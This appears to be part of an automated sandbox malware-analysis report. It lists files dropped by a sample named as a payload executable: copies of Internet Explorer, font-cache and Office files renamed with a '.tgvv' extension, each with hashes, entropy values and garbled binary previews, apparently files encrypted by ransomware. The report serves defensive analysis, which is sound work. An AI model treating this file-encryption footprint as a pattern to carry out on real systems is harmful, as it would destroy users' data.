                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):162608
                                                                                                      Entropy (8bit):7.978040557039432
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:Vz9s9rB9AZ9ltLkAank6V5VR8wz/zlD1rotwcBI7JU:NedB6TltmJV578OD1wwcR
                                                                                                      MD5:0C8C4237F7B269FE7BA72834A247CCE8
                                                                                                      SHA1:E8063DB00A933CA9C2CF3A2D7B8470261F67887B
                                                                                                      SHA-256:83730632A15300EA2AA819A58DBB78037EC27B15A56AB2509527DD41F98520D9
                                                                                                      SHA-512:9B447C6F6939449E25147F38FE77810F3C6F4D51A9EE8D5B6C18F607715061DCDA85855205D7B82B8C574EDAED40A8DB154F567CD348CAFD9E68C638C3220C40
                                                                                                      Malicious:false
                                                                                                      Preview:{"Maj+.B =...\.4[...GI..-R..=./T.S..j..rU.....F.....G....9.*pp...?j%.=.#...@..W....~G.}...O...awG.K,=....-...e,....\..':(v.:.....3.&...6...{..;(......CF.n..p9.NK.........m..e.UI.....la...%..d......[. ...D..a..V..E....Jx^e....f.."...KZ.mVW....).w..F....:.......K....<.......w..d.j0e.m.g.N....%....}).K......#.< ....Y.&.]......'6.%f?.\'..v.[T...6..+*....tq...H.I<"...]...t..&.L.......&.I..T.kbS5.E...a.M....l...."L.*....Z....E...V'...3.$m.....a.3"..n.....o._.n*...`..*W....~u..4..J.Z.....i..x.....8=(K;.,n#..)6...u.8...mC...J..5X.s..{'7.>#.k.y`8`%...!...b\X..\..l..^..d.3..6_K............-...D<..."2......`p..<@.u.v.nP.&.P..1.>Z...|.]..r.....i.{.7.Y?..w...O..47...}.*.!..6.H....\.^B..t..2.S...T.2m./...........Fk.W......[..Q..$..m1...(\....@...N...]..59E.|Q....$..Fe8|m.....l4Kz U.{.o=*B......q..G..2.?U...?....-8wq~..t.....+....k..?.1.3.N ......Z.......-7..V~.1Ol;u.,...X._..k....e...M.#.fW.K.`.4=g19$.;6.U*W_$b.].v%0C@.p...=..j..Ie....X...;..3T)We.c.1..

                                                                                                      C:\Users\user\Local Settings\Microsoft\FontCache\4\CatalogCacheMetaData.xml.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2203
                                                                                                      Entropy (8bit):7.912818901925949
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:j+Z1EerVETmtTp/90UY6tp2XxP0rKYdmwp9pHp3vtwqawD:j+Z0TmtH0Ip2BP0rzx3lw+
                                                                                                      MD5:781824E420591E1848C9C98E46CFD952
                                                                                                      SHA1:3402F7BC1CFF1240AA4E00BC2C55DA2A9CFC2662
                                                                                                      SHA-256:BEC4154084F5B1D7577BD55EE73955B6800D860ACEDE0196F9C311FDD1583781
                                                                                                      SHA-512:B320FF33EE555130747AB8F14D7E339BC346487FCCD0EE284F4D8F255018C25C4B9DBF4868840A78CF8BB21EE555748EE5E2D4F65BAED9E2843F26FC07286B24
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.1).=.X.T.".J[...{...I..63.x}.!mh.)8.#9.:.....\......B...(.bU7..XiGr..w@.2.m.....;.o'\5...[J8..9.....[.8J...G.r.....z/.....a...i(....[<.di$V...ww...o.#1....1(.u..O.'.0..B|b.2.E..~..?I.........7.C.....\.1d/...O6.Z......?..R.Y..\'/....v.B-.O.+G8/..3...5W.l./....6.Uk.......N..=y(O.....,Iz...LZzif*..YW[.:..X...H.&=....e..9...Y.......R..K'IY.2.caF...u...1.|H.g.qJ..E...AglDB_F.%.......Z.B.....8S4& 6ix|....m...e.6..@O...d..Z2t......r>../......C....=..k..wRf..E....;.....}......}..N..\K....`.dyS.......(.D..OSC(5+.@..Y.py....?.......7.FAT....>8e.........88y.8.W...Q=....\.(_2.Y...%w[..pk....WW.5....:...l."b..{@IF..c.d....(2.\|.s...U}..}..h..l.....V.~.c..h.$1..I%.....mQi.>.."?A.-C.7{.N.U.{6.N...a_F.."xaZ...>..7.!.q1..9.c$.D..Ej(Q.g\...-.I..G.h....%R ..2t....\..Tx..>.C..h...=..k .ul..;......4....U.@h..p`....q..`..6cy...-..... ..0..d..._.0b1.'.A...p......6....S......2.J(0+w..[.N.S......+.y.5-.l...?..........q.<A.w...5.e.N..q..m.X...|...r.

                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edb.chk.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8526
                                                                                                      Entropy (8bit):7.980229524822179
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:svi0nwizjN1HEjgaqXR2oO3x7tM1UBmFLn+A27Op:sviQXHEjxqh4xq1QCqADp
                                                                                                      MD5:E4844076B524CE40643016BE9C4E79B8
                                                                                                      SHA1:04FF8DDC178B29BD6095E248B8D77BE1FE330BB4
                                                                                                      SHA-256:10D56051E63AD44B3CE4A9BCF3479C79A55B892252AD7DC67346EAE3E5A42078
                                                                                                      SHA-512:5C94FC9397BB5BC80B425A740F2EA5C5B79EA38290A0AEDB8F0D777E7B30DEDBF808C949AB65AEF8C51AE65BD36EF02676473959EF68405FD2EB6587F9C8E54C
                                                                                                      Malicious:false
                                                                                                      Preview:A......a......\Q.."..V. {.UHj$.~..2\T..$(7.y.xm..H...q.UHxW.sWNL..1E.yL.P kn.....;.8u*.Uo..C/.Q.....e...+.J.....4...[..q.x.W..w.h..N:.......`."........c.\*..Bw...T.........MjZ..C.].e&3..h....}fmW.'...@..A....b.>`q....G0..}j=6...t..q.. ;..1..9...@.?..u"$v.0t...Z...5{...U_x..#.0(*b.i.x.W.8....L.......J..V..[.E..0....b.....Dys`n....4.H.....8..U.o5l..{.f.=.Y@].... ...;..q_..`.3.j...?n.u.^.......~T....!...&..$.......Dq..tXj..c~.K.hXT.....*..+N@m...`..:,E..[.......d(.N.......A.H.6..cu.@.t}v.*)8HKN\P...G.....O.....>.j#....6...D.jk6.....0.B.a..oV.\l.6..$P+E..w.....<..........@..mY.n.w.?.U..=...J..Q.S0+..Ga....pl.N=8~T3.6K.iO.a..?...|3K.Y......4....)......=m...kQi.zJw...../7`...f<........."...5.-0....9j.rJ;...D...#A6.@..[#.*.Y.{.L....Z..=.1H.x.4....`}.Y...!>.....e8...+EJ.....!...Y...y.@4....oJh......w...L..zU..D..S.7RZ.;..o5.....2..M...;...x....c..8)D.Zx..T2.:.ej..4...X.........b4....m.-....n..2.m.S..S...G...c...B....ZZ... .G.l....u.s.M:..N.0

                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edb.log.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):524622
                                                                                                      Entropy (8bit):4.009773086414051
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:kFTZ1ub6uPp12mFiJtYYWwOioEySlMSUIB2TT4JOH/kS9aFqM4lHJQz2Mi0As9lj:kFyXP/rDCvpv9hYQz2X/skCh/Bj
                                                                                                      MD5:120B3928710E37F7B866480DCA3CA2E6
                                                                                                      SHA1:C7EBD669F2CA36AB49C501BE74A77D2B041D0978
                                                                                                      SHA-256:EBE782591B644F6B6ABBDB3D9D107D06D919C5366844B9A51F47E4FCC94520D7
                                                                                                      SHA-512:3A324DB17A10C7DEE00E05852452EC046CA46DE3A910EA8D315BB0CB1FF916DC2CDD5BC8F70FF6F720F3C27B95E2DFB56F0517234A3ECCB6522D6CAAB5F665CD
                                                                                                      Malicious:false
                                                                                                      Preview:....:..kV3..@u0P..wW|..H3wIy...t.b<&..;....1...S.K..V.O..q.RxBn.*.b..}.5...w.o.."~..~.|.`...T.D.....H..]r..0A0..iSQZ....nm.....L1l....m...zx........B."U. .k....j..V3*6......JX..w.c..bBj..C^..P_....n..up.(e4...U. ..)......1i*rH..j.geS..z..xN...@....q......j....F"2. .!...M.;...gw..E./..Q..q..O.E.3M....#HO..x.b.....O2...-Ud.]...1z.DBZ.]4.I!..S.....J..J..z.......o.v...N...}K|.....]'...1>C.S(y..qJ...`.,C.._M~.....b#G..K...."D.:&[.kn"..~.P..A(.5..A..*.w....{..G.#.......!.C.~.../.C......r.1.0L....:..2s...b.:..n7.%.L.......r...N...{.+?......b.\Z"(.D..;6<l.ab......r.l@7.. ;.".+....V.....z..B..._..%.%.....l..@...@.S..?B.....^...J.../.1...=:.F....{[..<..~N.|4..............@M...u...N3.e.D.w.YE...?.0......c.........nn..]..#.>.....0..j.=&.zA%.Q.....0..1. ..$...L..WJ+..^....T........K..K..b.d..q5.+L.0..>{..%R9..A.Y........t2.N..m..\.....^...........i[.....t.3..9]e.a...?..u...2...L.v.s.W:...S%.E.d.P..4s ~...ted.R....zK'9Z.l.....z.Q...2...-..[..6

                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edbres00001.jrs.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):524622
                                                                                                      Entropy (8bit):3.2066304206642124
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:z/W6PXPa8cyUJ48/Jc43he0pHMM+UqXpz79SSyMCH8OEziWZ:rD2PJ48BcihpsDXpz4VC9
                                                                                                      MD5:CC960944396AEA4CC60DB3AE9B5C5009
                                                                                                      SHA1:89287B7EA97515D9871AB5B26198BD4B5E73897F
                                                                                                      SHA-256:4CEF89DB5A6E199A99120B0097627D5BE6D104A1047FBB8CACF40B65C87132BF
                                                                                                      SHA-512:8E80FDFADBA5C064CD5202E25E10370EA773E433E1797F584E72881A51AF9C73969FB92B49F70DEAAE8ABB53473F9BD1EA50C0776AA576AC343404F61F710252
                                                                                                      Malicious:false
                                                                                                      Preview:......W............1...j1^.{-XE.c.a.!.-Yn.............."..H{.........W...9F.......w..I\. ....&>.G.....S...^..r.(...[..2..?g..ou..O...N.&yY...*.m.M.<.........R.P3#....y...]V.-..P... ...:...m.O[.X..A.G1..?...........T2.@...w.H`o..d.Rh.^t(.Yg..".0..n..4.....:.yk/,..)GuPx_8..X-..e.:...h.....n..y.<...e.K&.a.*....l".M..s..s(w.. ....~Lxlom....Zaq:R7..,b.iv...G}.L...u`z.Ji...V6=.......}n.'..Q..?b;.*?.S..i...9*...z.....6.=\M.?. ...$j.k.....:...}...@rGj..pG....#...\.#......M2.n..`.L...Q.5..u-.q....~3.r..) >...c8_y.x.lz.?.(.).6.uz)1V_.......j...FU.....qN.@....r6.Ixy...t.(..a......n5m31.@X..t........T...>!C..2.$..ho...../....n...p."h.h.%R.,....<8....y..qJ...........Xh...`....PHPv..\kc....n.|.KT.....;.{.H:....`.o'..l.l...%1..kD......^.W........q:L.R.V..]....6.?.kn.....N..s.n;...K8TX.."........2..&....!.%.).~..)f.c...B..E3......x...Oz9m.5RSB.W.D...+a:5pL3...|.....~0.]..zX......a."h.....W..".\....@..y....R`b.!.a~......f.....Dq.@...I.....h.......:Q~..c[.

                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edbres00002.jrs.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):524622
                                                                                                      Entropy (8bit):3.2084784346438515
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:/7nUzDpBdzRlCfiUi/ql4scD8Wbnqx8vzeOlFi+DzS:/DEz2fiUgquD8W2rOG+y
                                                                                                      MD5:46DE8FB8B7C375990D64195D7344BED0
                                                                                                      SHA1:9A4BCC2DDD0033A58479567AB104D32E3FA5881A
                                                                                                      SHA-256:A96ED7C438917F7D2D7F70F412F1DD9925E4FC7FAD095C18AF8D81A20C72D18D
                                                                                                      SHA-512:2324CDCA0E7166D25716C82D0AD7E2552D5F3786536D77BC1592F1BA36EBDEDDC654C5B6EADD0A39FB20E498334C71A0C5C72B02B3C6CB7ADD81B51881AD457C
                                                                                                      Malicious:false
                                                                                                      Preview:..........cw.....r.-..h{...JR.~..0.V....:O..&..-.rY(.C.....)..?9.d..>m9K.3.......]ft.........+.].n.....o.K=.h..8.23....=...>....9c...u.e..3K.g..W0.....-..<#.c...3...b.uJ....8*P.+r!.!Z.s+.u..].S6.....@....q......-5..[P;=t....?N.~..wb...lq.H...`..6a..d.....w...T'.l....1....%....$#....>..L..HD..cHW.....v.+L|.M .n.......%r.....[V@;..O5...xXSX."..~....-..l]ZR.......S./H.....X..t..4.;-.*[.GVu8.>...h..e..F6..Y.W.tU.NRUo.Z5.K})...^..`6.e#..*kbW.'F.e......k...=e..5......M....|.Kz.."4."&..B......g~..*~b.^0...B[Ei.......i.^I....!.R..m\...M@....~...y.s8......U...[:..G....,.*k2.$.f...G5yv.6-r_...b..._H.......W.C(.r...T......=.IAai..yV..d.f.W...s..7..F.6..|..`...K./Z...%.J.I}"..~t..%..Lw.v..m..*3..iW.q.I.p.....&...b......Ex..$.U.y..Z.#.X...B..W...`..g..S.wT.5.P@.=..HROc.K.!...PZ.....k...0.}...........7.c....M......|]iX_y[.......e...;,:wRu..m.ao-zw......pnt.'.....#AS...._....."....,......)sn44....d*.y4q.I.....=.3I.@.H......6....k.1g.a.....I.

                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edbtmp.log.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):524622
                                                                                                      Entropy (8bit):3.208125813161908
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:ONbrM9SBDj8mRhlpmRKgepbY8ihq5E0OtmasBzE:yrM9SBDHLlQ4locOvsBw
                                                                                                      MD5:6477C901781CA814119963CEC3C8B17D
                                                                                                      SHA1:5FC86EA3A9DF32259AC79CA827D30541301037FE
                                                                                                      SHA-256:FCB70829B7B829009D98CF51A4884A014B21E239B360D06F085D7DD12753A458
                                                                                                      SHA-512:4AC2A967E4B3AAE5A7FAFED2B17D1B2D28AFE901165CB765DB8ECDB5DB9DE9A73F3557B70BA83C4A95097C620C5A69B96E6F7266ED429D4091F54DD9962B58D5
                                                                                                      Malicious:false
                                                                                                      Preview:.....dP....)b...3.Y\Q0...P?..........Y.......a..s....U.3n..z.*U.k.".!=..Y..cN...co..m..K]u.....Y..i%;..N.f.$......P......l*B..Q..%.......h..q.u.8Y....\..R.^1...6....&y..X...$...D.[.F..b]N..>."a.b>.L@.B.tyn...[G.A......3.jn...?.w2....4.G.c.J<e.a.g...fn.*8" .1.R...zg...n[.%=......P...0r.[.m.'. {...-....s....;..gJA4.9..{.....N.H<.......w8.......W.D./.i.*...&...`..A2Y;-fC..mF......'..'....r.u/.....1U.....Y.Q....f..f....n.|..P...d..(....Fh.._0..=....v.%.........R..v..U;A7.R.i8..L../f.%E.].2)..~.k.S.).M|Gg......s$..c....lY87.r./.g._..{r?.5'...sEygP..8..'.....t+....d.o..NRe....9....6MbkH.dG.c.......ca....Q?..0u. lB.m.F.....G.`.....S.CX.z..(.#L@..(.........q.+K(B.i...D...I..q3(<o...c..2....iRb._...*jP...3..!].M......Vm...'........%8'..h'.=...C...,.....l.%..].d.....>....&'...%w.H.}.]..d..'..Vv..u5..s........q.>..i....tv0}@..3.-..1..M.oJ...'.........+.i1.Lq..Z@~.......w.`..N.. U...q>.I..z..S.CW.....6..b....]F.....*ko.....@Z.c...Z.[0x....o.Nv......

                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3384
                                                                                                      Entropy (8bit):7.949107870001335
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:zb4Kgy50/0aUeUl9V54LFO6yGJITLvAXA:zbbaCzl/GLpJITLvCA
                                                                                                      MD5:6DC417183FC61E521E09A21C8FF07169
                                                                                                      SHA1:EAAF83DB7485A97CD0B6E8F4A970E19478313F42
                                                                                                      SHA-256:11A8A075710B038DE76B535DE75BEA0A9CCAE32360E73E6ED904AA482BE1135C
                                                                                                      SHA-512:1646EB13ACC2B29E2394C0DE72D659351B0EB7D116F1B3132A52BEAB0E583B85A0CCF9308F2D36F66E16A6482396C50A39CAF8DE5060F40CB9A70DAFE21C3DDF
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..P..-.Ne....E..8..1....N$........_s.pdt...k.....|.l........(.s}.n.A.]..8...R.q3>0.>.Q6..<.Z.....ix..>4y1-z^.....z.T..,:...#.k..O......A..%O...sY.....,.2.v@..].as...sA...A...P...>.e<.C..D..B..%......,..5-.6.N].......{.h."..4S.v.b....ak..n......%......+.c.......kW.....l..?...q.&...R.R...).h...O........~ND...)..p.>.3.x..v.....wZ.L..@W..../.c#..^.j...!.s./.{9..L.)[M..d......q...{aU..O.......F.....^(..A.S+n2..7~....J...^...D...bn.9K.....|.)l..0.`r.........7b...'.<VFF'.H._.(...e3V.oN..j&#5U/!-.U......V.'<.3..v.@uc..0?`x&..,.z.D.....UXg.?.y..M..#.......yie...kT."......i.:#...............d.e.J.......A.c.Y..[...~...&....>.X..1[-`,..$}.R....4."..Y<..*..m.p...[Ps.......<.....I.z.`........1...5...?.{......{U?.....K...E.c...w.W-..mv...._`pf0.{.....KM.4.N.^...u.Y.2.....\....{.e."..z..Hn...}.~.N.*.F...[..T....t.~o...q,.9.4O#e*3.......J9./..B'...............N....eW...O;Pg]/>...9OS...,...p.._.K.qv.`..f=1*}d^Cb._8X.(.....U..3........$...*.<...P,U.,-

                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\brndlog.txt.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6906
                                                                                                      Entropy (8bit):7.972304445434806
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:KngnRocauFAfRbETxEkc4X39inilSsiATTF4qVI:KgnGcaIcRbEFlXonqSsiAXF4cI
                                                                                                      MD5:8BAB689DD778160A842E9CFD0FC6C3D2
                                                                                                      SHA1:3A2334695B8A1E525A792F88A94D5E6F9147E100
                                                                                                      SHA-256:6B733C40D049A76D0AF48538544576E4F175595D9355A578147989A176C39B86
                                                                                                      SHA-512:EE44357FD27F3B4401D7B6C3FEF5B4B561B53E2FA35886D4F38C402F882680779BD6ECBED9080BA0C3E1F23123B4AA3C35AD4CF75A7E23E8379E3F2FCCAF1FC4
                                                                                                      Malicious:false
                                                                                                      Preview:10/03......?....\..S._t.F....@*#b3..U.'...N.....j...5..g-.:k#.9...#IC>...B...o...a.... s....F..'.$).?....%.9..LU}R.Y.}..9U...F.."..m%....~..{(.....].78SGp.U...*......*19....M.B.....k.%..5..'w.Zx..A>n.....5.....)....t(..d;q.....wE....i ..2C#...$.J.....>R.Hd..5~..nH..G(|j.].w.;WC.\u.D4|.L..2]K.\..oG?...U...<....._1.._.~8d.@.W|.jX.....I..6*...x'.<N......t....+r|../...c.K}..,.G.1K2l.....O3#.%.p."R..N.+..j.]5Xz.U...t.1...5r..Z~*...).w.T>.......L.#..O.....]....F\.iY.6.~..r..{._...^Q.%.......!S....O.`;.....;....Z.....*#....(0{.:.[.......9....#.Xe....Z?..qHd'....2r[.."78 ms\-......+..._...5f.`...........f].L8M...%..z.J..xvF=.x....H.e]...T7..h...... .N.~.$\.\...........C. B.......8.o..J~.[..........!....nX....`.+Hs..+...c.).y)....?....a.....cN].....xu...a.....II.:.../"(.......z!F.6=|.o&..T.={n...a{..~...fdL914.jh.M....?.KqfI...."P....U..i.#.rX...t.m.d...%..a....a..dR9 ^.x...t.N.....,...O..@|.@uVn.*.>SbGN."...6SSD.......$.J...5../5Xl..W..o

                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):834
                                                                                                      Entropy (8bit):7.738768422078147
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Qmj5+kUNOsuu15FIknlLi4Yuq57ta7aCv6bD:1jIOsu02vD/787aCwD
                                                                                                      MD5:5BF095B7F494BDCE3522E16D9B9BC40F
                                                                                                      SHA1:2160E805952BCD3A61640808E0363E8F490D7074
                                                                                                      SHA-256:E27703D21D055FB2297FEA466AA1C0B62F9917F9F000372D297F71E6A9745B7B
                                                                                                      SHA-512:FD72F206ECB2021E011DAB8530A277800DC488DABA4A244E5CBE80986CD6BDD0E5635B57505F8795646F9B97378333EF019F031F9E367B0DFFF7DD2A88AEA991
                                                                                                      Malicious:false
                                                                                                      Preview:..1.0f.F.Vp._..Q..Q.4.E.o...j.9y<...H.b.....vX..l.<....W..2.uB+...1H..)...^......^-$(..5...~.n......\.q..3c.S..]1.....\j..j.7b.[......M.He?mj.=...j.+....r...#A..4v^...=..R?..7.%,..<....N.0..``...q.&$..{.4.~..}..'.~X]..j.*6.Y.5...t....t...w.N.."..7......)...g.DU......o...B<t...Y...?..p......`....V..........f!.y;...B4&.r....wq...e..n.S@N...Zm...Xp%n..n-..A.D....W.O0....r.v.-Dq......7.......o..`....I.<K...@@....".lq.N..+..j-....<$.W.....H.hin.[.........m.u.`3y.(.d....Q..z.....Ig.R..RV2..m.^y.qR.......E}!..*.FX7&...b<[..@.i.q5..r........tS.a.......pz.......VIxr.k.R2.H.....Z....:8.....~....k.m9-m`'..... .b....nw.p...VQ......w....\.g....K9.....=QAx.+'..`,c.....V4..nq..7.#.=YN[.....)'r...T...........Q.9.#......fo/hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-UserConfig.log.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1740
                                                                                                      Entropy (8bit):7.869575411311135
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:0h4NALhktvBWMtrNKH4IfDkZgFoEtlk277FhNwD:HuhktJjt8kcd+
                                                                                                      MD5:DE23D8774C696A8629EF8139314C00BD
                                                                                                      SHA1:239A7040FB7E1C7860F92554F84C87900E8F035A
                                                                                                      SHA-256:B2C90E9113FFA1FDDD69E1AE26A783AD64A3FE8CB440EB900527074F2F1FEDC6
                                                                                                      SHA-512:EA7131BAD732BC6A46A960F8EF2C26EA440FBA48A78B37BA132CFC9A7C69BDB49982FE0C2917FE4705E0E902EC3B9E336FE56E85C979B92F81BA23BB868D5BBB
                                                                                                      Malicious:false
                                                                                                      Preview:..1.0.p.dC..D....../....Z......}hr@bT...+.E\.;<L.H.]........V3Q.BV....7(.....~.....K..!.}U.Z?..{F.....K...n...{.A.. ..cp..9'.. .....[j....5..A%..Ob...zwEm...R9Y(.`{z.`.Y.3..O....@...[.a...b..w.M.k3.u%.O.]..S.17.3."!...,.../-.s........i.W...Z..n.A........^]..p...'.B..b..."..nr.;.\..4.......2V..w..2.......2.~2..ekdk..$.)....FX..9....>.....li8..%.`.2.M.........y....9......n.[{'..7}...~z.....&..`(.........(.....l.E...I. #...I.QF..K..}..q.........4Q.#..vU..l.L..:....&....RUn...(.}1...$..f...q.!@6.X.B..G.n...U1k1...y.\.B.g.u..U])...q..y.!.._};j=..T...&./A......Vn...AwU.{.%....t.`..L[P..f...!.o....F..pLM. _../k..../.}.8...,_0.q.[.\[.....<.q....<.#.1.^.H=Y...UZh......@..E.l6.v....ET.c.u.#/...Q..:....v..v%..D.7W.]./....u>........ 6..0.R.~..E.J. ><.....9.%B....~....ieI.....*?.F.1.d........C....-.n *6.4....U...^fQ....e/hU1......U..U.B.! ......y.#<0...bQN.-...t...d..~..<K.KE.l......B....zS.`dv.].L....=Z.Y.7.~..@.H..w.F.k..k.\E9u...m.R...7.3.D..._.

                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\16.0\excel.exe_Rules.xml.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):208087
                                                                                                      Entropy (8bit):7.724209283101433
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:DeMNvYb4w+QATIAVMw/zf/IuMcZ0Xw4R6t/7fBf/yX6X4C+M:6MNvE4w+RTNVTTIuB54RWt/yXS4g
                                                                                                      MD5:71D2F9570952CCA65457DE9A60FAC959
                                                                                                      SHA1:B72FCA98C084BF7F131DE32D00C5278B97B63FBD
                                                                                                      SHA-256:FA60829EDFC95CF955F7A72E853786C201B1678A897A10B8F401597F478EBC51
                                                                                                      SHA-512:D219FB7262A3CFAE58914D9CC99E1618D27131650F0C7E5BD176F9424EEEA74D96FD7E51BA478D043DD5F214A69F14375BD60454ADDD8513A6BDA78A3E91638C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.TFB......K....;%..|...<p%.-y9..T.-R.....CY....GvT.......C.*.ox)w.NU..._.r.tC.ubM..e.+.a84...7..:Z...Y~..b+.....a.&....:.:B.|l\......../u.@....X...{:{vz..D`..LIR..&Uv.!]/..'..K..U:>9q.!R.d"....|"9.\...UAY.h.>.}..D...9...$.UT../.9.*z.?L..jRI........j..?.^.4.$.n.)..tu.8.%'R|I....b@C..O|...".9.$....`.(*$.....XCJ..^...u>]....[..<.....#.w.X.....O..2.....:..+B.....9.|&..A....)...*.....t...e..KX...].1p.e |1....%...^.E.:$.............. ..H.H..(........P....S(...C. ..2.T(..si....GG,...@}L... ...S.Um%Nw..._...\..V..=.K.'a}...-.........A...Unw.}...U....i.h.-X..t4X.[t>]..L...5....cy....5.6.4.$.......).4..Z..(+..'..x=..).......C20.<PY?..g.m.0....8.Kk.w.....NH...../.B._..$...%N1.zv5xI.#.Bi...f.U{.......O.e.%....0..G............W'.]Nin.=:.D...s...,.U.J..(^@.].gb..M%....}f.w.B..=>5w.=.>.c....Z}.Q.N.q]-.t....w.b.}3&...K.h.ZM.#....:C.i.>..w...{"Q........E........t<.@-.-H..%..ZW+.....F...GT....h..$...A0....v..$/.N.y.. ........q..)...T..........].

                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):321907
                                                                                                      Entropy (8bit):6.6275739041795285
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:DfQc2CYvV0Q33DkWcEBwM1XNnTkMabYAVndMpa:Dfott3DENMPnTkMa0qn6a
                                                                                                      MD5:8DDAE2492BA26CB46374307AA6B07FCE
                                                                                                      SHA1:A9687A892BC0EB6699784E6D377D1683E553B777
                                                                                                      SHA-256:19960016F77B30B69D62014DD2645C45222C08F2BEAFD4FEAAF63B6A799F3799
                                                                                                      SHA-512:ADBDEB2E8BBCFECD5E5AB4C3BE5DF2EACADA10B05103FAC0A1A96AB33A5FEB2DE692E7D4309E5DFB1683C9D22C293373BD7AA386D17924BE1007341D9200A2CB
                                                                                                      Malicious:false
